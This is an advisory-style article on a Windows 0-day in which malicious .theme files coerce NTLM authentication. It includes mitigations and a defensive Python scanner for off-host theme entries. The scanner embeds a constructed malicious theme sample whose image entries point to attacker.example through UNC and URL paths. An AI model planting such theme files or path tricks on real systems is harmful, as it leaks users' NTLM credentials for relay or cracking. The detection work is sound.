Introduction
A critical 0-day vulnerability has been discovered in all versions of Windows from Windows 7 to Windows 11 24H2. It lets an attacker coerce a victim's machine into authenticating to a remote host with NTLM, handing the attacker the user's NTLM credentials [2] [3]. The flaw was identified by ACROS Security during the development of a micropatch for a separate Windows theme vulnerability.
Description
All versions of Windows [2] [3], from Windows 7 to Windows 11 24H2 [2] [3] [4], contain a newly discovered 0-day vulnerability that allows attackers to remotely capture NTLM credentials from users of affected systems [2]. This flaw was identified by ACROS Security while developing a micropatch for CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft addressed in its July security update [2]. The newly identified vulnerability enables an authentication coercion attack [2] [3]: a vulnerable device is tricked into opening an authenticated connection to an attacker-controlled server and sends its NTLM challenge-response (the "NTLMv2 hash"), which is derived from the user's password hash [2]. A captured response can be relayed to another service in an NTLM relay attack or cracked offline to recover the password; it is not the stored NT hash itself, so it cannot be used directly in a Pass-the-Hash attack, but relaying alone is often enough to authenticate as the victim and reach sensitive data.
This vulnerability is the third associated with the same file path issue, following previous concerns raised by Akamai researcher Tomer Peled regarding CVE-2024-21320, which also involved theme files and the leakage of NTLM credentials when a malicious theme file is viewed in Windows Explorer. The original vulnerability allowed an attacker to craft a theme file whose image entries (for example BrandImage or Wallpaper) point to a remote network path; when Explorer renders the file, Windows fetches the image and authenticates to that host with NTLM, so the file only has to be displayed, not opened or applied [1] [3]. Notably, Microsoft's patch for CVE-2024-21320 relied on the PathIsUNC function to reject network paths, and PathIsUNC had publicly known bypasses [1], which led to the discovery of CVE-2024-38030.
ACROS Security reported the vulnerability to Microsoft on October 28, 2024 [2] [3], and plans to release further details and a proof-of-concept after Microsoft issues its patch [2]. Microsoft acknowledged the report and stated it would take necessary actions to protect customers [3], although no CVE has been assigned yet for this new issue [3]. The attacker needs no special privileges [3], but must get a malicious theme file in front of the user, for example in a folder the user browses in Explorer; viewing the file in a folder listing is enough to trigger the authentication [1] [3].
In response to these vulnerabilities, ACROS Security has created micropatches for both legacy and supported Windows versions through its 0patch service, providing users with unofficial security patches until Microsoft releases official fixes. These micropatches prevent the network requests that would expose NTLM credentials when theme files are viewed, and have been distributed automatically to affected systems running the 0patch Agent. Users can also apply the group policy Microsoft referenced for CVE-2024-21320, "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" set to "Deny all" (the RestrictSendingNTLMTraffic value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0), which blocks outbound NTLM from the host entirely. Recommendations include disabling NTLM where feasible [3], although this will break any application or network component that still authenticates with NTLM [2], so audit NTLM usage before enforcing the policy. The attack also requires that the coerced request reach the attacker's server [3]; outbound SMB is typically blocked at the network perimeter [3], so an internet-hosted collector usually fails, and exploitation is more likely in targeted campaigns or from an attacker who already has a foothold on the internal network, where host-to-host SMB is normally allowed. 0patch plans to continue supporting Windows 10 after its end of support in October 2025, ensuring ongoing protection for users [1].
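Because the trigger in every variant so far is a theme-file entry that points off-host, a defender can hunt for such files on shares and in user profiles without waiting for a patch. The following Python script is an added example (it is not code from 0patch, Akamai or Microsoft): it parses .theme files as INI text and flags any value that looks like a network path. It checks every key in every section because the page does not name the entry used by the newest variant; the path forms it flags and the two sample theme files are the editor's constructions, not data from the original page.

```python
"""Flag Windows .theme files whose entries point to a remote location.

Added example, not code from 0patch, Akamai or Microsoft. A .theme file is
INI text; when Explorer renders one whose image entries reference a network
path, Windows authenticates to that host with NTLM. Because the page does
not name the entry used by the newest variant, every key in every section
is checked. The path forms below are the editor's assumptions, not a list
taken from the original page.
"""
import re
from pathlib import Path

# Value shapes that make Windows resolve the target over the network (assumed).
REMOTE_PATTERNS = [
    ("UNC path", re.compile(r"^\\\\[^\\?.]")),                       # \\host\share\x
    ("device-prefixed UNC", re.compile(r"^\\\\[?.]\\UNC\\", re.I)),  # \\?\UNC\host\share\x
    ("forward-slash UNC", re.compile(r"^//[^/]")),                   # //host/share/x
    ("URL", re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")),             # http://, file://
]


def parse_theme(text):
    """Yield (section, key, value) from INI-style theme text."""
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        key, sep, value = line.partition("=")
        if sep:
            yield section, key.strip(), value.strip().strip('"')


def find_remote_references(text):
    """Return [(section, key, value, reason)] for every off-host value."""
    hits = []
    for section, key, value in parse_theme(text):
        for reason, pattern in REMOTE_PATTERNS:
            if pattern.match(value):
                hits.append((section, key, value, reason))
                break
    return hits


def read_theme_file(path):
    """Decode a .theme file; Windows writes them as ANSI, UTF-8 or UTF-16."""
    data = Path(path).read_bytes()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def scan_directory(root):
    """Map each *.theme under root that has off-host references to its hits."""
    results = {}
    for path in Path(root).rglob("*.theme"):
        hits = find_remote_references(read_theme_file(path))
        if hits:
            results[str(path)] = hits
    return results


# Constructed samples: a benign theme and one built to coerce NTLM authentication.
BENIGN_THEME = """\
; constructed sample
[Theme]
DisplayName=Corporate
BrandImage=C:\\Windows\\Web\\Wallpaper\\corp.png

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
"""

MALICIOUS_THEME = """\
[Theme]
DisplayName=Totally Normal
BrandImage=\\\\?\\UNC\\attacker.example\\share\\brand.png

[Control Panel\\Desktop]
Wallpaper=//attacker.example/share/wall.jpg

[Slideshow]
ImagesRootPath=https://attacker.example/dav/
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("malicious", MALICIOUS_THEME)):
        print(f"{name}:")
        for section, key, value, reason in find_remote_references(text):
            print(f"  [{section}] {key} -> {value}  ({reason})")
```

Run it against a copy of the share or profile from a patched host or a non-Windows workstation rather than browsing the folder in Explorer on an unpatched machine, since Explorer rendering the file is exactly what triggers the coercion. Packaged themes (.themepack and .deskthemepack) are CAB archives and need to be extracted before the .theme inside can be scanned.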
Conclusion
The discovery of this vulnerability underscores the ongoing challenges in securing Windows systems against sophisticated attacks. While ACROS Security has provided interim micropatches, users must remain vigilant and apply all available security measures, including disabling NTLM where possible [3]. Microsoft’s forthcoming patch will be crucial in mitigating this threat. The situation highlights the importance of proactive vulnerability management and the need for continuous support for legacy systems to protect against emerging threats.
References
[1] https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html
[2] https://aiandtechs.com/recurring-home-windows-flaw-might-expose-person-credentials/
[3] https://www.darkreading.com/vulnerabilities-threats/recurring-windows-flaw-could-expose-user-credentials
[4] https://www.hfrance.fr/de/der-neue-fehler-bei-den-windows-designs-wurde-mit-kostenlosen-inoffiziellen-patches-behoben.html